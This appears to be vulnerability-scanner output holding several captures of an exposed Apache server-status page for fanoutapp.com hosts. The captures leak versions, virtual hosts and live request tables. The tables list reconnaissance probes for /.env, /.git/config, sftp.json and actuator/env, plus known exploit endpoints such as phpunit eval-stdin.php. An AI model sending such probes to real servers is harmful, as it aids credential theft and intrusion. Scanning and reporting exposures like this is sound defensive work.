/login.action HTTP/1.1 1-3934475200/19/449_ 0.460350120.00.181.58 127.0.0.1http/1.1 1-3934475200/19/465_ 0.470855290.00.211.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/19/449_ 0.470351860.00.041.19 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/18/465_ 0.460248070.00.111.39 127.0.0.1http/1.1 1-3934475206/20/466W 0.450063920.00.111.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/16/452_ 0.470351370.00.031.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-3934475200/16/434_ 0.460852360.00.101.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/19/459_ 0.460349150.00.191.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/14/450_ 0.470256280.00.031.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/18/439_ 0.470255910.00.251.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/21/449_ 0.470343570.00.141.21 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/14/464_ 0.470343140.00.101.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 2-31-0/0/453. 0.006741608104750.00.001.34 127.0.0.1http/1.1editor.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf57e49ee1
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 19:16:17 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 20 hours 37 minutes 20 seconds Server load: 0.51 0.23 0.17 Total accesses: 37785 - Total Traffic: 105.9 MB - Total Duration: 513830 CPU Usage: u56.43 s93.63 cu775.76 cs286.87 - .0361% CPU load .0113 requests/sec - 33 B/second - 2937 B/request - 13.5988 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes025000 13447520no0yes124000 Sum200 149000 _______________________________________________W__.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/10/635_ 0.3407111930.00.021.39 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/11/620_ 0.3202104970.00.022.04 127.0.0.1http/1.1 0-3934475190/11/626_ 0.340679280.00.021.83 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/10/652_ 0.340498970.00.021.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3934475190/12/597_ 0.330483970.00.101.39 127.0.0.1http/1.1 0-3934475190/13/630_ 0.330594010.00.101.78 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3934475190/14/636_ 0.340887660.00.031.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/12/627_ 0.340479100.00.021.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3934475190/10/619_ 0.340780570.00.022.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3934475190/10/645_ 0.320288830.00.091.79 127.0.0.1http/1.1 0-3934475190/11/604_ 0.340291320.00.021.58 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/11/631_ 0.330788570.00.021.90 127.0.0.1http/1.1 0-3934475190/11/610_ 0.340383010.00.031.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/11/639_ 0.330788670.00.031.62 127.0.0.1http/1.1 0-3934475190/12/618_ 0.340395520.00.031.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/13/636_ 0.3307111880.00.031.68 127.0.0.1http/1.1 0-3934475190/13/614_ 0.330199700.00.091.49 127.0.0.1http/1.1 0-3934475190/13/628_ 0.340377440.00.022.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/8/626_ 0.340771720.00.021.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3934475190/15/631_ 0.340480380.00.031.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/13/613_ 0.340380820.00.021.52 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/13/641_ 0.340373870.00.031.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/15/608_ 0.340573960.00.031.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/13/642_ 0.340568630.00.031.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/12/626_ 0.330582220.00.031.91 127.0.0.1http/1.1 1-3934475200/19/456_ 0.450971580.00.121.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/19/449_ 0.450674800.00.041.20 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/14/440_ 0.450353610.00.031.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/15/452_ 0.450651730.00.031.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/18/466_ 0.450270920.00.031.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/14/453_ 0.450354040.00.131.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/17/466_ 0.450556250.00.181.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3934475200/16/456_ 0.450246090.00.181.38 127.0.0.1http/1.1 1-3934475200/20/461_ 0.450253780.00.041.12 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/15/444_ 0.4502663910.00.031.40 127.0.0.1http/1.1 1-3934475200/18/456_ 0.450358910.00.121.43 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/19/458_ 0.460551100.00.111.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/16/457_ 0.460243670.00.111.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/19/449_ 0.460350120.00.181.58 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/18/464_ 0.450455200.00.211.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/18/448_ 0.460851820.00.041.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3934475200/18/465_ 0.460248070.00.111.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/20/466_ 0.450263920.00.111.51 127.0.0.1http/1.1 1-3934475200/15/451_ 0.460351340.00.031.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/16/434_ 0.460852360.00.101.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/19/459_ 0.460349150.00.191.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/13/449_ 0.440256250.00.031.41 127.0.0.1http/1.1 1-39344752012/17/438W 0.450055880.00.251.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/20/448_ 0.450243540.00.141.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3934475200/13/463_ 0.450243110.00.101.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 2-31-0/0/453. 0.006741608104750.00.001.34 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 2-31-0/0/428. 0.006741601
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf30c11fcf
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 19:16:18 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 20 hours 37 minutes 21 seconds Server load: 0.51 0.23 0.17 Total accesses: 37870 - Total Traffic: 106.1 MB - Total Duration: 514154 CPU Usage: u56.46 s93.67 cu775.76 cs286.87 - .0361% CPU load .0113 requests/sec - 33 B/second - 2937 B/request - 13.5768 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes124000 13447520no0yes025000 Sum200 149000 ____W_____________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/12/637_ 0.3706112040.00.021.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/12/621_ 0.3402104990.00.022.04 127.0.0.1http/1.1 0-3934475190/12/627_ 0.360679350.00.021.83 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/11/653_ 0.360499010.00.021.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475192/13/598W 0.360084000.00.101.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/15/632_ 0.360294080.00.101.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/15/637_ 0.360687730.00.031.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/14/629_ 0.370179160.00.021.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/12/621_ 0.370680660.00.022.10 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/12/647_ 0.370388940.00.101.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/13/606_ 0.370691410.00.021.58 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/12/632_ 0.370188580.00.021.90 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/12/611_ 0.370683070.00.031.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/13/641_ 0.370488790.00.031.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/14/620_ 0.370395570.00.031.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/15/638_ 0.3703111930.00.031.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/15/616_ 0.370399780.00.101.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/13/628_ 0.340377440.00.022.07 127.0.0.1http/1.1 0-3934475190/10/628_ 0.370971870.00.021.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-3934475190/17/633_ 0.370380460.00.031.52 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-3934475190/13/613_ 0.340380820.00.021.52 127.0.0.1http/1.1 0-3934475190/15/643_ 0.370373930.00.031.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3934475190/17/610_ 0.370374020.00.041.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/15/644_ 0.370368680.00.041.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/14/628_ 0.370282280.00.041.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/1393e2932313e2130313e2135313/_/;/META-INF/maven/com.atla 1-3934475200/19/456_ 0.450971580.00.121.57 127.0.0.1http/1.1 1-3934475200/20/450_ 0.480374830.00.051.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-3934475200/15/441_ 0.480253640.00.041.44 127.0.0.1http/1.1 1-3934475200/18/455_ 0.500351810.00.041.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e25363e2130313e2135313/_/;/META-INF/maven/com.atlass 1-3934475200/21/469_ 0.500771070.00.041.47 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3934475200/16/455_ 0.480354120.00.141.46 127.0.0.1http/1.1 1-3934475200/19/468_ 0.500956380.00.181.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3934475200/17/457_ 0.470346120.00.191.39 127.0.0.1http/1.1 1-3934475200/21/462_ 0.480153790.00.051.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/17/446_ 0.480363990.00.041.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.env HTTP/1.1 1-3934475200/20/458_ 0.480258970.00.121.44 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/21/460_ 0.480251160.00.121.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3934475200/18/459_ 0.480243720.00.121.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/20/450_ 0.480250150.00.181.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 1-3934475200/20/466_ 0.480355320.00.211.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.env HTTP/1.1 1-3934475200/20/450_ 0.480251890.00.041.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/19/466_ 0.480848160.00.111.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-3934475200/21/467_ 0.470163940.00.121.51 127.0.0.1http/1.1 1-3934475200/17/453_ 0.480251400.00.031.27 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/18/436_ 0.480352420.00.101.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3934475200/20/460_ 0.490249180.00.191.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 1-3934475200/16/452_ 0.490256340.00.041.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3934475200/20/441_ 0.490255960.00.251.58 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/23/451_ 0.490343650.00.151.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/16/466_ 0.500243220.00.111.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 2-31-0/0/453. 0.006741618104750.00.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf6815c40d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 14:12:07 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 15 hours 33 minutes 10 seconds Server load: 0.25 0.21 0.18 Total accesses: 37492 - Total Traffic: 103.9 MB - Total Duration: 512247 CPU Usage: u55.97 s93.08 cu775.76 cs286.87 - .0363% CPU load .0112 requests/sec - 32 B/second - 2907 B/request - 13.6628 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes025000 13447520no0yes124000 Sum200 149000 _____________________________________________W____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/5/630_ 0.192190111620.00.011.38 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3934475190/7/616_ 0.232245104870.00.012.03 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-3934475190/6/621_ 0.14224079000.00.011.82 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3934475190/6/648_ 0.21248998780.00.011.78 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3934475190/8/593_ 0.23253183710.00.091.38 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3934475190/8/625_ 0.23254393790.00.021.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 0-3934475190/9/631_ 0.23254387390.00.021.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-3934475190/8/623_ 0.23165478980.00.011.57 127.0.0.1http/1.1api.hnstream.com:8000GET /geoserver/web/ HTTP/1.1 0-3934475190/6/615_ 0.19160680330.00.012.09 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3934475190/6/641_ 0.212591688670.00.091.78 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3934475190/7/600_ 0.212581291170.00.011.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3934475190/7/627_ 0.21258488400.00.011.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/7/606_ 0.21258382340.00.021.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/6/634_ 0.21258388140.00.021.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/8/614_ 0.21257395290.00.021.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/9/632_ 0.222563111610.00.021.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/8/609_ 0.22256399520.00.011.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/8/623_ 0.22256277250.00.012.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/5/623_ 0.21257371230.00.011.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/9/625_ 0.21257379960.00.021.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/8/608_ 0.22255380670.00.021.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/8/636_ 0.22255373670.00.021.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-3934475190/9/602_ 0.22255373710.00.021.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3934475190/8/637_ 0.22254368360.00.021.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-3934475190/7/621_ 0.23254381940.00.011.90 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3934475200/11/448_ 0.29171671270.00.021.48 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/11/441_ 0.292374230.00.021.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3934475200/7/433_ 0.27166153410.00.011.41 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3934475200/7/444_ 0.27415151410.00.011.52 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3934475200/11/459_ 0.29420170360.00.021.45 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3934475200/7/446_ 0.277692553370.00.011.34 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /robots.txt HTTP/1.1 1-3934475200/8/457_ 0.297742755600.00.011.52 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/10/450_ 0.301145870.00.101.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/11/452_ 0.2932353350.00.021.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/10/439_ 0.293363500.00.021.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/11/449_ 0.292258680.00.021.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3934475200/11/450_ 0.292350550.00.021.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3934475200/9/450_ 0.302343460.00.021.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/10/440_ 0.301349760.00.091.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/12/458_ 0.301254890.00.121.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/10/440_ 0.301251440.00.021.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/11/458_ 0.301347880.00.091.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/14/460_ 0.300263610.00.101.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/8/444_ 0.300351070.00.011.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3934475200/8/426_ 0.300352130.00.081.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-39344752011/13/453W 0.280049030.00.101.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/10/446_ 0.29856056150.00.021.40 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3934475200/9/430_ 0.29856055340.00.091.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3934475200/11/439_ 0.29855042740.00.051.11 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3934475200/7/457_ 0.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabff2e521ae
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 16-Feb-2025 05:24:26 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 38 Parent Server MPM Generation: 37 Server uptime: 36 days 6 hours 45 minutes 28 seconds Server load: 0.18 0.16 0.17 Total accesses: 35236 - Total Traffic: 96.9 MB - Total Duration: 493919 CPU Usage: u52.84 s87.62 cu736.54 cs273.33 - .0367% CPU load .0112 requests/sec - 32 B/second - 2883 B/request - 14.0175 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03273670no1yes025010 13273671no1yes124010 Sum202 149020 ________________________________W_________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3732736700/7/590_ 0.155600103840.00.021.27 127.0.0.1http/1.1hnstream.com:8000GET /sitemap_index.xml.gz HTTP/1.1 0-3732736700/5/573_ 0.115603102560.00.011.92 185.93.89.118http/1.1api.hnstream.com:8000GET /production/api/vendor/phpunit/phpunit/src/Util/PHP/eval-st 0-3732736700/5/579_ 0.12561176140.00.021.71 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3732736700/6/610_ 0.165392360.00.011.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3732736700/5/546_ 0.156480580.00.021.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3732736700/5/586_ 0.15735787400.00.091.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3732736700/6/584_ 0.135551082150.00.021.67 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-3732736700/8/580_ 0.156276990.00.101.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3732736700/5/572_ 0.155378290.00.021.97 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3732736700/5/598_ 0.163186150.00.011.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3732736700/6/560_ 0.15566084270.00.021.40 127.0.0.1http/1.1hnstream.com:8000GET /sitemap_index.xml.gz HTTP/1.1 0-3732736700/6/589_ 0.12566086050.00.021.72 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3732736700/4/557_ 0.10569379550.00.011.26 185.93.89.118http/1.1api.hnstream.com:8000GET /pms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-3732736700/6/592_ 0.161386000.00.021.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3732736700/9/569_ 0.162392360.00.021.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3732736700/8/584_ 0.1643108980.00.021.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3732736700/5/564_ 0.164397890.00.021.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3732736700/9/578_ 0.164374010.00.021.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3732736700/4/580_ 0.163369460.00.011.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3732736700/6/583_ 0.162377390.00.021.39 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3732736700/7/565_ 0.162378880.00.021.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3732736700/8/593_ 0.161571730.00.021.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-3732736700/9/559_ 